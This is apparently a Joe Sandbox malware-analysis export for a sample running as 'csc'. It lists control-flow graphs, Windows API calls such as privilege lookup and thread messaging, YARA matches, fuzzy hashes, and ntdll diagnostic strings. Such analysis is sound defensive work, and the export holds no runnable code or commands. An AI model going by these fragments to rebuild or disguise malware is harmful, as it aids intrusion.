                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DE01B531A8032976E721A6A59C43FEE772CAB41B54F14015EFE04BA1C2E6A8690547EA

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 230 408310-40831f 231 408328-40835a call 41ca00 call 40acf0 call 414e50 230->231 232 408323 call 41be60 230->232 239 40835c-40836e PostThreadMessageW 231->239 240 40838e-408392 231->240 232->231 241 408370-40838a call 40a480 239->241 242 40838d 239->242 241->242 242->240
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1836367815-0
                                                                                                                                                                                                                                                                                  • Opcode ID: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                                                                                                  • Instruction ID: fe648ddaccc693dff6b318d6e20673cc1517f8ca6da234ac2c2ad493b9bfa733
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eeb461d9a93cfa80389428809ed4c10d2a707c26e4e5d313531af448f679d8da
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF018431A8032C76E721A6959C43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 260 41a7c2-41a7c9 261 41a7a3-41a7c0 260->261 262 41a7cb-41a7ea call 41af60 260->262 265 41a7ef-41a804 LookupPrivilegeValueW 262->265
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                                                                                                                                  • Instruction ID: 23f3b5c59c3bf1b946c484d1dd1b09d9bbd519211ec81ee406c7880a26dda3c9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 68a7fb53f19db8fc4b0122ea7caf60be0d3c4a228c37affc46d7d3906d4fc120
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4CF022B62002086BDB10DFA9DC80EE73369EF89720F04864AFD1C47281C534E8158BB0

                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                  control_flow_graph 277 41a670-41a6a1 call 41af60 RtlFreeHeap
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A69D
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A800
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3899507212-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6D8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6906080166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_400000_csc.jbxd
                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Thread identifier, xrefs: 05CD5345
                                                                                                                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD52D9
                                                                                                                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 05CD52C1
                                                                                                                                                                                                                                                                                  • Critical section debug info address, xrefs: 05CD522A, 05CD5339
                                                                                                                                                                                                                                                                                  • corrupted critical section, xrefs: 05CD52CD
                                                                                                                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 05CD5236
                                                                                                                                                                                                                                                                                  • Critical section address, xrefs: 05CD5230, 05CD52C7, 05CD533F
                                                                                                                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD5215, 05CD52A1, 05CD5324
                                                                                                                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 05CD534E
                                                                                                                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 05CD52B9, 05CD5305
                                                                                                                                                                                                                                                                                  • 8, xrefs: 05CD50EE
                                                                                                                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 05CD52ED
                                                                                                                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 05CD5313
                                                                                                                                                                                                                                                                                  • Critical section address., xrefs: 05CD530D
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                                                                                                                                                                                  • API String ID: 0-2515994595
                                                                                                                                                                                                                                                                                  • Opcode ID: 1519d33937ed725a7f1bd10c1f6a49e4d9a2656cf4a68fc7c2530082920703f0
                                                                                                                                                                                                                                                                                  • Instruction ID: 561ba0c25c86554364f6b3695c3f2e4c778d91ef4c02f4a0b6ae2bb43eba56cb
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1519d33937ed725a7f1bd10c1f6a49e4d9a2656cf4a68fc7c2530082920703f0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BC51C2B16083159BD325DF18D949BABBBE8FF84254F045D2EF99983280E770D604E793
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                                                                  • API String ID: 0-2224505338
                                                                                                                                                                                                                                                                                  • Opcode ID: 0b77d3b6c96591e8a0948ef459e72cc22ec5de9e4097a1852761c87ef2a57185
                                                                                                                                                                                                                                                                                  • Instruction ID: f9737f60df1434c1b077733f213a1f151e645e0064093b8e8033337ce1e9b186
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b77d3b6c96591e8a0948ef459e72cc22ec5de9e4097a1852761c87ef2a57185
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE512636301246EFC721DF94C889F6AB7B4EF04A74F244C6AF8069B291C676DD80EA55
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 05CE86BD
                                                                                                                                                                                                                                                                                  • VerifierFlags, xrefs: 05CE88D0
                                                                                                                                                                                                                                                                                  • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 05CE86E7
                                                                                                                                                                                                                                                                                  • VerifierDebug, xrefs: 05CE8925
                                                                                                                                                                                                                                                                                  • VerifierDlls, xrefs: 05CE893D
                                                                                                                                                                                                                                                                                  • AVRF: -*- final list of providers -*- , xrefs: 05CE880F
                                                                                                                                                                                                                                                                                  • HandleTraces, xrefs: 05CE890F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                                                                                                                                                                                                                                                  • API String ID: 0-3223716464
                                                                                                                                                                                                                                                                                  • Opcode ID: e1d5de2ec47e91d889153358673dff3e6f7e61308cc4be6e881c2e99c0f15280
                                                                                                                                                                                                                                                                                  • Instruction ID: b9aed847a0a3b7367bda17c8865b3b38750c8b0eae054d4c6d89b75c0807a3a2
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e1d5de2ec47e91d889153358673dff3e6f7e61308cc4be6e881c2e99c0f15280
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E1912572A447119FDB22DF689885F2ABBA9FB40714F890C1AF9416B350CB70AD04DBD2
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                                                                  • API String ID: 0-523794902
                                                                                                                                                                                                                                                                                  • Opcode ID: fe01183fe02000582967f58b706d00888abafb732d0ce2d14d5d592013f2a452
                                                                                                                                                                                                                                                                                  • Instruction ID: b452bbdb6134819025bd8111a7135504392f0299bf145da6799a71bf02cacdde
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe01183fe02000582967f58b706d00888abafb732d0ce2d14d5d592013f2a452
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6442FFB12083819FD719CF68C488B6ABBE6FF84614F044D6DE896CB351D770DA81CB66
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-122214566
                                                                                                                                                                                                                                                                                  • Opcode ID: 31f125db958b80e03b5e71dad1473f164d071734026e727246e40161516f0c05
                                                                                                                                                                                                                                                                                  • Instruction ID: 8377986fa091d652b02c5b9a2769fc92ad2fb13f8624deb6ab3b3c7e740282a3
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f125db958b80e03b5e71dad1473f164d071734026e727246e40161516f0c05
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 91C13931B0521DABCB15CB69C899B7FBBA5BF45708F144CA9E8039B690EB74DD84C390
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • apphelp.dll, xrefs: 05C56446
                                                                                                                                                                                                                                                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 05CB9790
                                                                                                                                                                                                                                                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 05CB97B9
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05CB97A0, 05CB97C9
                                                                                                                                                                                                                                                                                  • LdrpInitShimEngine, xrefs: 05CB9783, 05CB9796, 05CB97BF
                                                                                                                                                                                                                                                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 05CB977C
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-204845295
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Loading import redirection DLL: '%wZ', xrefs: 05CD7F7B
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrredirect.c, xrefs: 05CD7F8C, 05CD8000
                                                                                                                                                                                                                                                                                  • LdrpInitializeImportRedirection, xrefs: 05CD7F82, 05CD7FF6
                                                                                                                                                                                                                                                                                  • minkernel\ntdll\ldrinit.c, xrefs: 05C9C5E3
                                                                                                                                                                                                                                                                                  • Unable to build import redirection Table, Status = 0x%x, xrefs: 05CD7FF0
                                                                                                                                                                                                                                                                                  • LdrpInitializeProcess, xrefs: 05C9C5E4
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-475462383
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 05CD1FA9
                                                                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 05CD1F82
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 05CD1FC9
                                                                                                                                                                                                                                                                                  • RtlGetAssemblyStorageRoot, xrefs: 05CD1F6A, 05CD1FA4, 05CD1FC4
                                                                                                                                                                                                                                                                                  • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 05CD1F8A
                                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CD1F6F
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                                                                                                                                                                                                                                                  • API String ID: 0-861424205
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Allowed, xrefs: 05C8519B
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Number-Allowed, xrefs: 05C85167
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-SKU, xrefs: 05C8534B
                                                                                                                                                                                                                                                                                  • WindowsExcludedProcs, xrefs: 05C8514A
                                                                                                                                                                                                                                                                                  • Kernel-MUI-Language-Disallowed, xrefs: 05C85272
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                                                                                                                                                                                                                  • API String ID: 0-258546922
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: $$$$LdrShutdownProcess$Process 0x%p (%wZ) exiting$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                                                                  • API String ID: 0-1975516107
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
• Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlFreeHeap
                                                                                                                                                                                                                                                                                  • API String ID: 0-3061284088
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 05CD20C0
                                                                                                                                                                                                                                                                                  • .Local, xrefs: 05C927F8
                                                                                                                                                                                                                                                                                  • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 05CD1FE3, 05CD20BB
                                                                                                                                                                                                                                                                                  • SXS: %s() passed the empty activation context, xrefs: 05CD1FE8
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.6907354046.0000000005C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C30000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D59000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.6907354046.0000000005D5D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_5c30000_csc.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                                                                                                                                                                                                                                                  • API String ID: 0-1239276146
                                                                                                                                                                                                                                                                                  • Opcode ID: 59901d111660ef109f35844c3fbe4430716dd14b9f00feb8da8f9db0c25a8050
                                                                                                                                                                                                                                                                                  • Instruction ID: ef8842b52c832fdc24f31a5da953cd91e89e8868093be8af2a296677eee30caf
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 59901d111660ef109f35844c3fbe4430716dd14b9f00feb8da8f9db0c25a8050
